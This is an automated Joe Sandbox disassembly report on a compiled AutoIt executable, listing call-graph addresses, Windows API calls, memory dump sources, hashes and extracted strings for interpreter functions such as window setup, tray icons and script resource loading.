7ff74d034680 4 API calls 94961->94962 94964 7ff74d0340b5 94962->94964 94999 7ff74d0340e8 94964->94999 94967 7ff74d07bb0f 94966->94967 95003 7ff74d051ad0 CompareStringW 94966->95003 94968 7ff74d0340cb Concurrency::wait 94968->94477 94970 7ff74d036460 105 API calls 94969->94970 94971 7ff74d0363e5 94970->94971 94972 7ff74d07c656 94971->94972 94973 7ff74d036460 105 API calls 94971->94973 94974 7ff74d0b2948 90 API calls 94972->94974 94975 7ff74d036400 94973->94975 94976 7ff74d07c66e 94974->94976 94975->94972 94979 7ff74d036408 94975->94979 94977 7ff74d07c672 94976->94977 94978 7ff74d07c690 94976->94978 94980 7ff74d03652c 63 API calls 94977->94980 94981 7ff74d054c68 4 API calls 94978->94981 94982 7ff74d07c67b 94979->94982 94983 7ff74d036414 94979->94983 94980->94982 94998 7ff74d07c6dd Concurrency::wait 94981->94998 95005 7ff74d0ac5c8 77 API calls wprintf 94982->95005 95004 7ff74d03e774 143 API calls Concurrency::wait 94983->95004 94986 7ff74d07c68a 94986->94978 94987 7ff74d036438 94987->94470 94988 7ff74d07c895 94989 7ff74d03652c 63 API calls 94988->94989 94997 7ff74d07c8a9 94989->94997 94994 7ff74d03ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94994->94998 94997->94988 95011 7ff74d0a76d8 77 API calls 3 library calls 94997->95011 94998->94988 94998->94994 94998->94997 95006 7ff74d0a7400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94998->95006 95007 7ff74d0a730c 39 API calls 94998->95007 95008 7ff74d0b0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94998->95008 95009 7ff74d03b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94998->95009 95010 7ff74d039940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94998->95010 95000 7ff74d034107 94999->95000 95002 7ff74d034130 memcpy_s 94999->95002 95001 7ff74d054c68 4 API calls 95000->95001 95001->95002 95002->94968 95003->94966 95004->94987 95005->94986 
95006->94998 95007->94998 95008->94998 95009->94998 95010->94998 95011->94997 95013 7ff74d039762 95012->95013 95018 7ff74d03988d 95012->95018 95014 7ff74d054c68 4 API calls 95013->95014 95013->95018 95015 7ff74d039791 95014->95015 95016 7ff74d054c68 4 API calls 95015->95016 95021 7ff74d03981c 95016->95021 95018->94482 95021->95018 95024 7ff74d03abe0 81 API calls 2 library calls 95021->95024 95025 7ff74d039940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95021->95025 95026 7ff74d03b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95021->95026 95022->94484 95023->94486 95024->95021 95025->95021 95026->95021 95027->94497 95028 7ff74d035dec 95029 7ff74d035df4 95028->95029 95030 7ff74d035e98 95029->95030 95031 7ff74d035e28 95029->95031 95052 7ff74d035e96 95029->95052 95033 7ff74d07c229 95030->95033 95034 7ff74d035e9e 95030->95034 95035 7ff74d035f21 PostQuitMessage 95031->95035 95036 7ff74d035e35 95031->95036 95032 7ff74d035e6b DefWindowProcW 95056 7ff74d035e7c 95032->95056 95084 7ff74d04ede4 8 API calls 95033->95084 95037 7ff74d035ecc SetTimer RegisterWindowMessageW 95034->95037 95038 7ff74d035ea5 95034->95038 95035->95056 95039 7ff74d035e40 95036->95039 95040 7ff74d07c2af 95036->95040 95044 7ff74d035efc CreatePopupMenu 95037->95044 95037->95056 95042 7ff74d035eae KillTimer 95038->95042 95043 7ff74d07c1b8 95038->95043 95045 7ff74d035e49 95039->95045 95046 7ff74d035f2b 95039->95046 95096 7ff74d0aa40c 16 API calls __scrt_get_show_window_mode 95040->95096 95070 7ff74d035d88 95042->95070 95049 7ff74d07c1bd 95043->95049 95050 7ff74d07c1f7 MoveWindow 95043->95050 95044->95056 95045->95052 95060 7ff74d035f0b 95045->95060 95061 7ff74d035e5f 95045->95061 95074 7ff74d054610 95046->95074 95048 7ff74d07c255 95085 7ff74d052c44 47 API calls Concurrency::wait 95048->95085 95057 7ff74d07c1e4 SetFocus 95049->95057 95058 7ff74d07c1c2 95049->95058 95050->95056 95052->95032 95053 7ff74d07c2c3 95053->95032 95053->95056 
95057->95056 95058->95061 95062 7ff74d07c1cb 95058->95062 95082 7ff74d035f3c 26 API calls __scrt_get_show_window_mode 95060->95082 95061->95032 95067 7ff74d035d88 Shell_NotifyIconW 95061->95067 95083 7ff74d04ede4 8 API calls 95062->95083 95066 7ff74d035f1f 95066->95056 95068 7ff74d07c280 95067->95068 95086 7ff74d036258 95068->95086 95071 7ff74d035d99 __scrt_get_show_window_mode 95070->95071 95072 7ff74d035de4 95070->95072 95073 7ff74d035db8 Shell_NotifyIconW 95071->95073 95081 7ff74d037098 DeleteObject DestroyWindow Concurrency::wait 95072->95081 95073->95072 95075 7ff74d0546db 95074->95075 95076 7ff74d05461a __scrt_get_show_window_mode 95074->95076 95075->95056 95097 7ff74d0372c8 95076->95097 95078 7ff74d0546a2 KillTimer SetTimer 95078->95075 95079 7ff74d054660 95079->95078 95080 7ff74d09aaa1 Shell_NotifyIconW 95079->95080 95080->95078 95081->95056 95082->95066 95083->95056 95084->95048 95085->95061 95087 7ff74d036287 __scrt_get_show_window_mode 95086->95087 95121 7ff74d0361c4 95087->95121 95090 7ff74d03632d 95092 7ff74d03634e Shell_NotifyIconW 95090->95092 95093 7ff74d07c644 Shell_NotifyIconW 95090->95093 95094 7ff74d0372c8 6 API calls 95092->95094 95095 7ff74d036365 95094->95095 95095->95052 95096->95053 95098 7ff74d0372f4 95097->95098 95117 7ff74d0373bc Concurrency::wait 95097->95117 95099 7ff74d0398e8 4 API calls 95098->95099 95100 7ff74d037303 95099->95100 95101 7ff74d07cdfc LoadStringW 95100->95101 95102 7ff74d037310 95100->95102 95104 7ff74d07ce1e 95101->95104 95103 7ff74d037cf4 4 API calls 95102->95103 95105 7ff74d037324 95103->95105 95108 7ff74d03e0a8 4 API calls 95104->95108 95106 7ff74d037336 95105->95106 95107 7ff74d07ce30 95105->95107 95106->95104 95109 7ff74d037343 95106->95109 95120 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95107->95120 95112 7ff74d03734f wcscpy __scrt_get_show_window_mode 95108->95112 95119 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection 

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D0337F2
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033807
                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D03388D
                                                                                            • Part of subcall function 00007FF74D033F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF74D0338BF,?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033FFD
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033924
                                                                                          • MessageBoxA.USER32 ref: 00007FF74D07B888
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D07B8E1
                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D07B968
                                                                                          • ShellExecuteW.SHELL32 ref: 00007FF74D07B98F
                                                                                            • Part of subcall function 00007FF74D033B84: GetSysColorBrush.USER32 ref: 00007FF74D033B9E
                                                                                            • Part of subcall function 00007FF74D033B84: LoadCursorW.USER32 ref: 00007FF74D033BAE
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BC3
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BDC
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BF5
                                                                                            • Part of subcall function 00007FF74D033B84: LoadImageW.USER32 ref: 00007FF74D033C21
                                                                                            • Part of subcall function 00007FF74D033B84: RegisterClassExW.USER32 ref: 00007FF74D033C85
                                                                                            • Part of subcall function 00007FF74D033CBC: CreateWindowExW.USER32 ref: 00007FF74D033D0C
                                                                                            • Part of subcall function 00007FF74D033CBC: CreateWindowExW.USER32 ref: 00007FF74D033D5F
                                                                                            • Part of subcall function 00007FF74D033CBC: ShowWindow.USER32 ref: 00007FF74D033D75
                                                                                            • Part of subcall function 00007FF74D036258: Shell_NotifyIconW.SHELL32 ref: 00007FF74D036350
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                          • API String ID: 1593035822-3287110873
                                                                                          • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                          • Instruction ID: 730ae8579dde39b83d179a7f8b6cae414c1b66c9f911cb3f3f2953d05d819c01
                                                                                          • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                          • Instruction Fuzzy Hash: B6713B21A1C683D6EA20BB20E9841F9E361BF45344FC50636D9CD175B6FEBDE649CB20

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                          • String ID: AU3!$EA06$SCRIPT
                                                                                          • API String ID: 3051347437-2925976212
                                                                                          • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                          • Instruction ID: 48765a2920f2c4fb766031c4172e8eb36678a4ab3b653212e55733a2297afad1
                                                                                          • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                          • Instruction Fuzzy Hash: 8391CF72B0D651C6EB20FB21E558ABCABA0BB45BC4FC14139DE9D477A5EF79E4048320

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                          • String ID: |O
                                                                                          • API String ID: 1568231622-607156228
                                                                                          • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                          • Instruction ID: aa6ee9c63333291d34e5610088bbe7f7dffe6cd6c7cc7ca9bbf84ce6e6ee4711
                                                                                          • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                          • Instruction Fuzzy Hash: 4DD14A25B1D2C3C9E621BB11F810175BB91AF16788FD28279D9CD13666FE7EA500CB21

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1787492119-0
                                                                                          • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                          • Instruction ID: 6e5a0e89297c475481722d7c12543a2a0f2779b659434ef0f104e4d3e444339c
                                                                                          • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                          • Instruction Fuzzy Hash: E3E18022B0DB41C6EB14FB26D5542BDA7A1FB84B84F804536EE9E477A9EF38E405C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2695905019-0
                                                                                          • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                          • Instruction ID: 850ccf7ad2c3d0bcd6a2c0840760b6555f65de101002a5b1579e6b72aecdbf03
                                                                                          • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                          • Instruction Fuzzy Hash: C3F05E50E0C606C1EA24BB34B80C338A260FF95B75F984B30D5BE0B2F4EF6CD4994220

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                          • API String ID: 2667193904-1575078665
                                                                                          • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                          • Instruction ID: 20dac265365587ea99de16a398501b98a11114563096d7b23365d633e9f3ceb3
                                                                                          • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                          • Instruction Fuzzy Hash: B6912922A1CA83D5EB20FB24E8401BDA364FF84744BC10636E98D47AA5FF7DE645C760

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                          • Instruction ID: a78e14727ba7d0c28cebb54baaf2a3af36935a7a6d89a33f505ac1bf597970d7
                                                                                          • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                          • Instruction Fuzzy Hash: 52514531E0C647C6FA28FB24AA4C278E250AF55B80FC50535D8CD536B1FEBDE5458720

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-2659433951
                                                                                          • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                          • Instruction ID: 258a306c74f86ae56d228fe69ebad4c0f6772c8a02d2eaa8303e029d7f36c752
                                                                                          • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                          • Instruction Fuzzy Hash: 28311632A0CB46CAE700EB60F8483A877B4BB48758F900639DA9D57B64EF7D9159CB50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                          • String ID: close all
                                                                                          • API String ID: 1992507300-3243417748
                                                                                          • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                          • Instruction ID: e816f5ba0f7c0e42d2ab7f5b5df4feacbb9732992063b42fdb6826c544ae5199
                                                                                          • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                          • Instruction Fuzzy Hash: B9E13D21B4EA02C1EE58FB16C6546BCA361FF85B44FD44475DB8E532A1EF7CE8628720

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: AutoIt v3
                                                                                          • API String ID: 423443420-1704141276
                                                                                          • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                          • Instruction ID: 1e837a84cdabf5ea3b05550f0c3f4142eb2e8ce267a16adb9c17c320d3917dd5
                                                                                          • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                          • Instruction Fuzzy Hash: DE31E236A0CB42CAE750EB51F8483A8B364BB88754F854639CD8D27B24EF7DE1548B60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                          • String ID:
                                                                                          • API String ID: 1617910340-0
                                                                                          • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                          • Instruction ID: 139bcaae08489b3036bb6e3e74736404e93b05d0910dc86e6109c40d0c7f4c9b
                                                                                          • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                          • Instruction Fuzzy Hash: 48C1BC32B1CA45CAEB10EB64D4553BC7761AB89BA8F401235DEAE5B7A5EF38D015C320

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                          • String ID:
                                                                                          • API String ID: 3249950245-0
                                                                                          • Opcode ID: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                                                          • Instruction ID: 1604de5c1701d756a31aef4b9a02616ad1d09062d314a52c95d023c6a19cfeb9
                                                                                          • Opcode Fuzzy Hash: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                                                          • Instruction Fuzzy Hash: 49229F32A0D682CAEB64FB20E4587BDA7A0FB45B44F944135DACE436A5EF7DE441C720

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 849 7ff74d033cbc-7ff74d033d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$Show
                                                                                          • String ID: AutoIt v3$d$edit

                                                                                          APIs
